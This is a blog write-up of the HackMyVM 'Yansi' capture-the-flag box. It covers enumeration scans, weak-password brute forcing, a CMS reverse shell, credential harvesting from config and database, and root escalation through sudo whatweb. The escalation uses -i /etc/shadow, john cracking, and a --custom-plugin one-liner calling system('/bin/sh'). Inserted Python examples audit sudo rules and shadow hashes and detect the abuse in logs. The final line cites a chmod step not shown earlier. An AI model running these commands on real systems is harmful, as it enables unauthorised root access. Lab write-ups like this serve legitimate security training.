HackMyVM-Yansi

A fairly friendly box.

Target IP: 192.168.56.116

Information gathering


nmap:

nmap -T4 -A -v 192.168.56.116 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-08 10:14 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating ARP Ping Scan at 10:14
Scanning 192.168.56.116 [1 port]
Completed ARP Ping Scan at 10:14, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:14
Completed Parallel DNS resolution of 1 host. at 10:14, 0.00s elapsed
Initiating SYN Stealth Scan at 10:14
Scanning 192.168.56.116 [1000 ports]
Discovered open port 80/tcp on 192.168.56.116
Discovered open port 22/tcp on 192.168.56.116
Completed SYN Stealth Scan at 10:14, 0.07s elapsed (1000 total ports)
Initiating Service scan at 10:14
Scanning 2 services on 192.168.56.116
Completed Service scan at 10:14, 6.06s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.116
NSE: Script scanning 192.168.56.116.
Initiating NSE at 10:14
Completed NSE at 10:14, 0.18s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.01s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Nmap scan report for 192.168.56.116
Host is up (0.00075s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: CMS Portal
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
MAC Address: 08:00:27:0A:3E:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Uptime guess: 21.103 days (since Sun May 18 07:46:31 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.75 ms 192.168.56.116

NSE: Script Post-scanning.
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.286KB)

gobuster:

gobuster dir -u 192.168.56.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.116
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 8845]
/login.php (Status: 200) [Size: 8738]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

dirsearch:

dirsearch -u 192.168.56.116
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.116/_25-06-08_10-25-30.txt

Target: http://192.168.56.116/

[10:25:30] Starting:
[10:25:30] 403 - 279B - /.ht_wsr.txt
[10:25:30] 403 - 279B - /.htaccess.orig
[10:25:30] 403 - 279B - /.htaccess.bak1
[10:25:30] 403 - 279B - /.htaccess.sample
[10:25:30] 403 - 279B - /.htaccess.save
[10:25:30] 403 - 279B - /.htaccess_extra
[10:25:30] 403 - 279B - /.htaccess_sc
[10:25:30] 403 - 279B - /.htaccessOLD
[10:25:30] 403 - 279B - /.htaccess_orig
[10:25:30] 403 - 279B - /.htaccessBAK
[10:25:30] 403 - 279B - /.htaccessOLD2
[10:25:30] 403 - 279B - /.htm
[10:25:30] 403 - 279B - /.html
[10:25:30] 403 - 279B - /.htpasswd_test
[10:25:30] 403 - 279B - /.httr-oauth
[10:25:30] 403 - 279B - /.htpasswds
[10:25:31] 403 - 279B - /.php
[10:25:43] 200 - 2KB - /login.php
[10:25:48] 403 - 279B - /server-status/
[10:25:48] 403 - 279B - /server-status

Very few ports and pages turned up in the scans, so I went straight to the site's homepage.

Getshell


Clicking Access Portal in the bottom-left corner leads to a back-end management page; the note at the bottom says the site is built with CMS Made Simple, and the version is the latest, 2.21. Clicking the "click here" link on the right takes you to the administrator back-end login.

Looking back at the earlier login.php, its username is hard-coded to admin, and a hint at the bottom gives the password rule: eight characters, digits mixed with letters.

(Because the password itself is weak, picking any wordlist cracks it easily; hyh even filtered the rockyou wordlist with a regex. If the next one is designed to be more complex I won't be this lucky.)

Brute-forcing gives admin123, but after logging in it just redirects back to index.

That made me wonder whether the CMS admin back-end uses the same password; logging in with admin:admin123 gets into the back-end. (Brute-forcing it directly would also work here, since they are all weak passwords.)

Then go to Extensions -> User Defined Tags, execute code there and get a reverse shell. (This has been around for several versions already; surprisingly it still hasn't been fixed.)

Privilege escalation


www-data@Yansi:/var/www/html/cmsms$ cat config.php 
<?php

# CMS Made Simple Configuration File

# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference

#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'root';
$config['db_password'] = 'root123';
$config['db_name'] = 'Test';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'UTC';
?>www-data@Yansi:/var/www/html/cmsms$

Looking at config.php, it contains the database account and password; from the database we read the google user's password.

www-data@Yansi:/var/www/html/cmsms$ mysql -uroot -proot123
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 23781
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use Test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [Test]> select * from cms_users ;
+---------+----------+----------------------------------+--------------+--------------------+-------------+-----------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+--------------------+-------------+-----------------+--------+---------------------+---------------------+
| 1 | admin | b8411ccfcf8036d818f0e3e5bbcd24de | 1 | | | admin@admin.com | 1 | 2025-06-08 03:52:15 | 2025-06-08 04:26:41 |
| 2 | google | bc7254fff92665852c30b85b9e812836 | 1 | password:google123 | user:google | | 1 | 2025-06-08 04:05:12 | 2025-06-08 04:05:12 |
| 3 | demo | 190359934f28f5eaf4cf315802020a87 | 1 | | | | 1 | 2025-06-08 04:07:40 | 2025-06-08 04:07:40 |
+---------+----------+----------------------------------+--------------+--------------------+-------------+-----------------+--------+---------------------+---------------------+
3 rows in set (0.000 sec)

MariaDB [Test]>

In fact, this is visible directly from the web admin interface, which saves quite a bit of work.

SSH in as the google user and get the user flag.

ssh google@192.168.56.116
The authenticity of host '192.168.56.116 (192.168.56.116)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.116' (ED25519) to the list of known hosts.
google@192.168.56.116's password:
Linux Yansi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 8 09:54:03 2025 from 192.168.56.104
google@Yansi:~$ ls
user.txt
google@Yansi:~$ cat user.txt
flag{user-e93a188c288106b24060679d47cc630f}
google@Yansi:~$

Root


google@Yansi:~$ sudo -l
Matching Defaults entries for google on Yansi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User google may run the following commands on Yansi:
(ALL) NOPASSWD: /usr/bin/whatweb
google@Yansi:~$

sudo -l shows which files may be run with sudo: there is a whatweb under the bin directory.
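As an added defender-side example (not part of the original writeup), here is a small Python audit that parses `sudo -l` output like the one above and flags rules that grant a binary able to read arbitrary files or load code, which whatweb can do through -i and -p/--custom-plugin. The RISKY_COMMANDS table is an assumption constructed for this example; the sample input is the sudo -l output shown in this post.

```python
import re
from dataclasses import dataclass

# Constructed for this example: binaries whose sudo rules need a second look.
# whatweb is listed because the writeup shows -i reading any file as root and
# -p / --custom-plugin loading Ruby code as root.
RISKY_COMMANDS = {
    "/usr/bin/whatweb": "reads arbitrary files (-i) and loads Ruby plugins (-p, --custom-plugin)",
}

# sudo -l output copied from the writeup above
SAMPLE_SUDO_L = r"""
Matching Defaults entries for google on Yansi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User google may run the following commands on Yansi:
    (ALL) NOPASSWD: /usr/bin/whatweb
"""


@dataclass
class SudoRule:
    runas: str      # the (runas) part, e.g. ALL or root
    nopasswd: bool  # NOPASSWD: tag present
    command: str    # command path plus any fixed arguments sudo enforces


# "(ALL) NOPASSWD: /usr/bin/whatweb"  ->  runas, tags, command list
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Parse the rule lines that follow 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        nopasswd = "NOPASSWD:" in tags
        for cmd in commands.split(","):  # several commands may share one line
            if cmd.strip():
                rules.append(SudoRule(runas.strip(), nopasswd, cmd.strip()))
    return rules


def assess(rules, risky=RISKY_COMMANDS):
    """Return (command, reason) for each rule that deserves review."""
    findings = []
    for rule in rules:
        path = rule.command.split()[0]
        if path == "ALL":
            findings.append((rule.command, "unrestricted sudo"))
            continue
        if path not in risky:
            continue
        reason = risky[path]
        if rule.nopasswd:
            reason += "; no password required"
        if rule.command == path:
            reason += "; arguments not restricted by the rule"
        findings.append((rule.command, reason))
    return findings


if __name__ == "__main__":
    for cmd, why in assess(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"REVIEW {cmd}: {why}")
```

The last check matters most: a sudoers entry that names only the binary lets the caller pass any arguments, so the tool's file-reading and plugin-loading options run as root. sudoers(5) lets a rule pin the exact arguments (or forbid them with a trailing `""`), which is the fix for a tool like this.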

google@Yansi:/usr/bin$ sudo whatweb -h

.$$$ $. .$$$ $.
$$$$ $$. .$$$ $$$ .$$$$$$. .$$$$$$$$$$. $$$$ $$. .$$$$$$$. .$$$$$$.
$ $$ $$$ $ $$ $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$ $$$ $ $$ $$ $ $$$$$$.
$ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$'
$. $ $$$ $. $$$$$$ $. $$$$$$ `$ $. $ :' $. $ $$$ $. $$$$ $. $$$$$.
$::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $$$$
$;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$$$
$$$$$$ $$$$$ $$$$ $$$ $$$$ $$$ $$$$ $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$'


WhatWeb - Next generation web scanner version 0.5.5.
Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles).
Homepage: https://www.morningstarsecurity.com/research/whatweb

Usage: whatweb [options] <URLs>

TARGET SELECTION:
<TARGETs> Enter URLs, hostnames, IP addresses, filenames or
IP ranges in CIDR, x.x.x-x, or x.x.x.x-x.x.x.x
format.
--input-file=FILE, -i Read targets from a file. You can pipe
hostnames or URLs directly with -i /dev/stdin.

TARGET MODIFICATION:
--url-prefix Add a prefix to target URLs.
--url-suffix Add a suffix to target URLs.
--url-pattern Insert the targets into a URL.
e.g. example.com/%insert%/robots.txt

AGGRESSION:
The aggression level controls the trade-off between speed/stealth and
reliability.
--aggression, -a=LEVEL Set the aggression level. Default: 1.
1. Stealthy Makes one HTTP request per target and also
follows redirects.
3. Aggressive If a level 1 plugin is matched, additional
requests will be made.
4. Heavy Makes a lot of HTTP requests per target. URLs
from all plugins are attempted.

HTTP OPTIONS:
--user-agent, -U=AGENT Identify as AGENT instead of WhatWeb/0.5.5.
--header, -H Add an HTTP header. eg "Foo:Bar". Specifying a
default header will replace it. Specifying an
empty value, e.g. "User-Agent:" will remove it.
--follow-redirect=WHEN Control when to follow redirects. WHEN may be
`never', `http-only', `meta-only', `same-site',
or `always'. Default: always.
--max-redirects=NUM Maximum number of redirects. Default: 10.

AUTHENTICATION:
--user, -u=<user:password> HTTP basic authentication.
--cookie, -c=COOKIES Use cookies, e.g. 'name=value; name2=value2'.
--cookie-jar=FILE Read cookies from a file.

PROXY:
--proxy <hostname[:port]> Set proxy hostname and port.
Default: 8080.
--proxy-user <username:password> Set proxy user and password.

PLUGINS:
--list-plugins, -l List all plugins.
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
Optionally search with keywords in a comma
delimited list.
--search-plugins=STRING Search plugins for a keyword.
--plugins, -p=LIST Select plugins. LIST is a comma delimited set
of selected plugins. Default is all.
Each element can be a directory, file or plugin
name and can optionally have a modifier, +/-.
Examples: +/tmp/moo.rb,+/tmp/foo.rb
title,md5,+./plugins-disabled/
./plugins-disabled,-md5
-p + is a shortcut for -p +plugins-disabled.
--grep, -g=STRING|REGEXP Search for STRING or a Regular Expression. Shows
only the results that match.
Examples: --grep "hello"
--grep "/he[l]*o/"
--custom-plugin=DEFINITION Define a custom plugin named Custom-Plugin,
Examples: ":text=>'powered by abc'"
":version=>/powered[ ]?by ab[0-9]/"
":ghdb=>'intitle:abc \"powered by abc\"'"
":md5=>'8666257030b94d3bdb46e05945f60b42'"
"{:text=>'powered by abc'}"
--dorks=PLUGIN List Google dorks for the selected plugin.

OUTPUT:
--verbose, -v Verbose output includes plugin descriptions.
Use twice for debugging.
--colour,--color=WHEN control whether colour is used. WHEN may be
`never', `always', or `auto'.
--quiet, -q Do not display brief logging to STDOUT.
--no-errors Suppress error messages.

LOGGING:
--log-brief=FILE Log brief, one-line output.
--log-verbose=FILE Log verbose output.
--log-errors=FILE Log errors.
--log-xml=FILE Log XML format.
--log-json=FILE Log JSON format.
--log-sql=FILE Log SQL INSERT statements.
--log-sql-create=FILE Create SQL database tables.
--log-json-verbose=FILE Log JSON Verbose format.
--log-magictree=FILE Log MagicTree XML format.
--log-object=FILE Log Ruby object inspection format.
--log-mongo-database Name of the MongoDB database.
--log-mongo-collection Name of the MongoDB collection.
Default: whatweb.
--log-mongo-host MongoDB hostname or IP address.
Default: 0.0.0.0.
--log-mongo-username MongoDB username. Default: nil.
--log-mongo-password MongoDB password. Default: nil.
--log-elastic-index Name of the index to store results. Default: whatweb
--log-elastic-host Host:port of the elastic http interface. Default: 127.0.0.1:9200

PERFORMANCE & STABILITY:
--max-threads, -t Number of simultaneous threads. Default: 25.
--open-timeout Time in seconds. Default: 15.
--read-timeout Time in seconds. Default: 30.
--wait=SECONDS Wait SECONDS between connections.
This is useful when using a single thread.

HELP & MISCELLANEOUS:
--short-help Short usage help.
--help, -h Complete usage help.
--debug Raise errors in plugins.
--version Display version information.

EXAMPLE USAGE:
* Scan example.com.
./whatweb example.com

* Scan reddit.com slashdot.org with verbose plugin descriptions.
./whatweb -v reddit.com slashdot.org

* An aggressive scan of wired.com detects the exact version of WordPress.
./whatweb -a 3 www.wired.com

* Scan the local network quickly and suppress errors.
whatweb --no-errors 192.168.0.0/24

* Scan the local network for https websites.
whatweb --no-errors --url-prefix https:// 192.168.0.0/24

* Scan for crossdomain policies in the Alexa Top 1000.
./whatweb -i plugin-development/alexa-top-100.txt \
--url-suffix /crossdomain.xml -p crossdomain_xml

We see that -i can be used to read files.

google@Yansi:/usr/bin$ sudo whatweb -i /root/root.txt
Unable to parse invalid target : Invalid character in host: 'flag{root-594359512f516a5f9c80930b6c388d10}'
No targets selected

But that is not the end of it; we still don't have a root shell.

Since -i can read files, the natural next thought is to read shadow.

google@Yansi:/usr/bin$ sudo whatweb -i /etc/shadow
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: "$6$0Eykzb257cANR9sU$mH05O99a8NTNnSBx6j"
Unable to parse invalid target : Invalid port number: ""
Prepare Target Failed - Invalid port number: ""

But the file is not read in full. Checking the whatweb documentation at this point shows it also provides a feature for running local plugins, which opens up many more options.

First, read shadow through the plugin option.

Error loading plugin /etc/shadow. Error details: /etc/shadow:1: syntax error, unexpected ':', expecting end-of-input
root:sbSGfTY5rMGMg:20247:0:99999:7:::
No plugins selected, exiting.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo "sbSGfTY5rMGMg" > 1.txt

┌──(root㉿kali)-[/home/kali/Desktop]
└─# john 1.txt --wordlist=/home/kali/Desktop/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
juicybab (?)
1g 0:00:00:00 DONE (2025-06-08 11:08) 33.33g/s 7372Kp/s 7372Kc/s 7372KC/s luckycat..calor
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
google@Yansi:/usr/bin$ su root
Password:
root@Yansi:/usr/bin#

Successfully got a root shell.
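The root hash above is 13 characters with no `$id$` prefix, i.e. traditional DES crypt, which is why john labelled it descrypt and cracked it instantly: descrypt only uses the first eight characters of the password and a 12-bit salt. As an added example, not from the original writeup, this Python audit classifies /etc/shadow entries by hash format and flags the legacy ones. The sample lines are constructed: the root line is the one recovered above, the other hash bodies are placeholders, not real hashes.

```python
import re

# Constructed sample. The root line is the one the writeup recovered; every
# other hash body is a placeholder, not a real hash.
SAMPLE_SHADOW = """\
root:sbSGfTY5rMGMg:20247:0:99999:7:::
daemon:*:19000:0:99999:7:::
google:$6$0Eykzb257cANR9sU$PLACEHOLDERHASHBODYxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:20247:0:99999:7:::
legacy:$1$abcdefgh$PLACEHOLDERHASHBODYxxx:20247:0:99999:7:::
guest::20247:0:99999:7:::
"""

# Hash prefixes as documented in crypt(5): (prefix, algorithm, legacy?)
HASH_PREFIXES = [
    ("$y$", "yescrypt", False),
    ("$7$", "scrypt", False),
    ("$2b$", "bcrypt", False),
    ("$2y$", "bcrypt", False),
    ("$2a$", "bcrypt", False),
    ("$6$", "sha512crypt", False),
    ("$5$", "sha256crypt", False),
    ("$1$", "md5crypt", True),
]

# Traditional DES crypt: 2-character salt followed by 11 characters of hash
DESCRYPT_RE = re.compile(r"[./0-9A-Za-z]{13}")


def classify_hash(field):
    """Return (algorithm, legacy?) for one /etc/shadow password field."""
    if field == "":
        return ("empty", True)            # login possible without a password
    if field.startswith(("!", "*")):
        return ("locked", False)          # password login disabled
    for prefix, name, legacy in HASH_PREFIXES:
        if field.startswith(prefix):
            return (name, legacy)
    if DESCRYPT_RE.fullmatch(field):
        return ("descrypt", True)
    return ("unknown", True)


def audit_shadow(lines):
    """Return (user, algorithm, note) for every entry that needs attention."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw_field = fields[0], fields[1]
        algo, legacy = classify_hash(pw_field)
        if not legacy:
            continue
        if algo == "descrypt":
            note = ("DES crypt: only the first 8 password characters count and the "
                    "salt is 12 bits; rehash with yescrypt or sha512crypt")
        elif algo == "empty":
            note = "no password set"
        elif algo == "md5crypt":
            note = "md5crypt is fast to brute-force; rehash"
        else:
            note = "unrecognised hash format"
        findings.append((user, algo, note))
    return findings


if __name__ == "__main__":
    for user, algo, note in audit_shadow(SAMPLE_SHADOW.splitlines()):
        print(f"{user}: {algo}: {note}")
```

On a Debian 11 host like this one the default is yescrypt (`$y$`), so a bare 13-character root hash is a sign the password was set with a legacy tool or copied in by hand; changing the root password once through passwd would rehash it.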

Another method is to use whatweb's custom plugin feature directly to spawn a shell.

(I have never written Ruby, so this privilege-escalation one-liner was borrowed from a group member.)

google@Yansi:~$ sudo whatweb --custom-plugin="{:name=>'Malicious', :version=>//, :string => (system('/bin/sh') rescue nil)}"
# id
uid=0(root) gid=0(root) groups=0(root)

For the proper way to write one, see the whatweb documentation.
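From the detection side, every whatweb invocation in this post is written by sudo to the auth log as a `COMMAND=...` line before whatweb does anything, so the misuse is visible in one place. This added Python example, not from the original writeup, parses such lines and flags whatweb runs that read local files (-i), load plugin files (-p) or define an inline plugin (--custom-plugin). The log lines are constructed to mirror the commands above; the field layout follows sudo's default syslog format.

```python
import os
import re

# Constructed sample of sudo's syslog lines, mirroring the commands in this post.
SAMPLE_LOG = """\
Jun  8 10:58:01 Yansi sudo:   google : TTY=pts/0 ; PWD=/home/google ; USER=root ; COMMAND=/usr/bin/whatweb -a 1 http://127.0.0.1/
Jun  8 10:59:12 Yansi sudo:   google : TTY=pts/0 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/whatweb -i /root/root.txt
Jun  8 11:00:40 Yansi sudo:   google : TTY=pts/0 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/whatweb -i /etc/shadow
Jun  8 11:02:05 Yansi sudo:   google : TTY=pts/0 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/whatweb -p /etc/shadow
Jun  8 11:05:33 Yansi sudo:   google : TTY=pts/0 ; PWD=/home/google ; USER=root ; COMMAND=/usr/bin/whatweb --custom-plugin={:name=>'Malicious', :version=>//, :string => (system('/bin/sh') rescue nil)}
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s*:\s*(?P<fields>.*)$")
FILE_OPTS = {"-i", "--input-file"}
PLUGIN_OPTS = {"-p", "--plugins"}
SENSITIVE = ("/etc/shadow", "/etc/sudoers", "/root/")


def parse_sudo_line(line):
    """Split 'user : TTY=... ; PWD=... ; USER=... ; COMMAND=...' into a dict."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    fields = {"invoker": m.group("user")}
    for part in m.group("fields").split(" ; "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def option_values(argv):
    """Yield (option, value) for the --opt=value, --opt value and -o value forms."""
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--") and "=" in arg:
            opt, value = arg.split("=", 1)
            yield opt, value
        elif arg.startswith("-") and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            yield arg, argv[i + 1]
            i += 1
        else:
            yield arg, None
        i += 1


def inspect_whatweb(argv):
    """Return the reasons a whatweb argv is abuse-shaped; [] for a plain scan."""
    reasons = []
    for opt, value in option_values(argv):
        if opt in FILE_OPTS and value is not None:
            level = "sensitive" if value.startswith(SENSITIVE) else "local"
            reasons.append(f"reads {level} file {value} as root via {opt}")
        elif opt in PLUGIN_OPTS and value is not None and "/" in value:
            reasons.append(f"loads Ruby plugin code from {value} as root")
        elif opt == "--custom-plugin":
            reasons.append("defines an inline Ruby plugin (arbitrary code as root)")
    return reasons


def detect(log_lines):
    """Return one alert per sudo line that runs whatweb in an abuse-shaped way."""
    alerts = []
    for line in log_lines:
        fields = parse_sudo_line(line)
        if not fields or "COMMAND" not in fields:
            continue
        # sudo logs argv joined by single spaces without shell quoting
        argv = fields["COMMAND"].split()
        if not argv or os.path.basename(argv[0]) != "whatweb":
            continue
        reasons = inspect_whatweb(argv)
        if reasons:
            alerts.append({"invoker": fields["invoker"], "runas": fields.get("USER"),
                           "command": fields["COMMAND"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(f"{alert['invoker']} -> {alert['runas']}: {alert['command']}")
        for reason in alert["reasons"]:
            print(f"    {reason}")
```

The first sample line, an ordinary scan of a URL, produces no alert; the four that follow each do. Since the flag file and shadow contents also surface in whatweb's own error output, a rule like this is most useful when paired with the sudoers fix above rather than as a substitute for it.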

##
# This file is part of WhatWeb and may be subject to
# redistribution and commercial restrictions. Please see the WhatWeb
# web site for more information on licensing and terms of use.
# https://morningstarsecurity.com/research/whatweb
#
Plugin.define do
name "Plugin-Tutorial-1"
authors [
"Your preferred name <email@address>", # v0.1 # 2019-01-01 # Created plugin
]
version "0.1"
description "Generic CMS is an open-source Content Management System developed in PHP."
website "http://example.com/"

# This is the matches array.
# Each match is treated independently.

# Matches #
matches [
# This searches for a text string.
{ :text => "This page was generated by <b>Generic CMS</b>" },

# This searches for a regular expression. Note that the slashes are escaped.
{ :regexp => /This page was generated by <a href="http:\/\/www.genericcms.com\/en\/products\/generic-cms\/">Generic CMS<\/a>/ },

# This extracts the version of Generic CMS from the Mega generator tag.
{ :name => "Meta generator", :version => /<meta name="generator" content="Generic CMS version ([a-z0-9])+/ },
]

end

Just insert the chmod+x /bin/bash mentioned above into the middle of it.


HackMyVM-Yansi
http://example.com/2025/06/08/HackMyVM-Yansi/
Author: Skyarrow
Posted on: June 8, 2025